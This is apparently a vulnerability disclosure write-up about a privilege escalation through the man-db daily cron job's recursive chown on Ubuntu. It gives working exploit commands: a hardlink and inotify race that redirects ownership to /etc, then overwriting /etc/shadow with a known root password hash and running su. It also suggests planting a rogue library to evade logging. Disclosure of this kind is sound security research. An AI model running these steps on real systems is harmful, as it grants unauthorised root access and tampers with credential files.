
Problem description:

The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. This happens e.g. under Ubuntu Vivid with /etc/cron.daily/man-db when systemd is not installed (/run/systemd/system does not exist). The problematic code is

# expunge old catman pages which have not been read in a week if [ ! -d /run/systemd/system ] && [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then echo "Running find" >&2 find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi start-stop-daemon --start --pidfile /dev/null --startas /bin/sh \ --oknodo --chuid man $iosched_idle -- -c \ "find /var/cache/man -type f -name '*.gz' -atime +6 -print0 | \ xargs -r0 rm -f" fi

On Ubuntu Trusty, problematic code looks similar, just has no dependency to systemd existance:

# expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ...


Finding hardlinking target: To start with, user man has to hardlink a file not owned by user man. Without hardlink protection (/proc/sys/fs/protected_hardlinks set to 0), any root owned system file will do and chown will make it accessible to user man.

Without hardlink protection, user man one could race with find traversing the directories. It seems that new version of find with fts uses secure open and always checks stat of each file inode, both when entering subdirectories and when leaving. So a real hardlink to a file of another user is needed.

Even with hardlink protection, linking to file writable by user man is still allowed, but files have to reside on same file system. On standard Ubuntu Vivid system, there are just few target files:

man# find / -mount -type f -perm -0002 2> /dev/null /var/crash/.lock man# ls -al /var/crash/.lock -rwxrwxrwx 1 root root 0 May 23 13:10 /var/crash/.lock

Using Timerace Using Inotify: As the mandb cronjob will change ownership of any file to user man, there are numerous targets for privilege escalation. The one I like best when /bin/su SUID binary is available to change /etc/shadow. PAM just does not recognise this state, so only root password has to be cleared for su logon. For that purpose, the good old inotify-tool DirModifyInotify-20110530.c from a previous article. To escalate following steps are sufficient:

man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow

If one does not want want PAM or su to write something to logs, trip over some audit/apparmor settings, we may want to make some library directory man-owned and place rogue library variant there.

Results, Discussion

It seems that user man is not really used, hence privilege escalation is not so much of a deal. But there are two things to be considered:


Material, References

Last modified 20171228
Contact e-mail: me (%)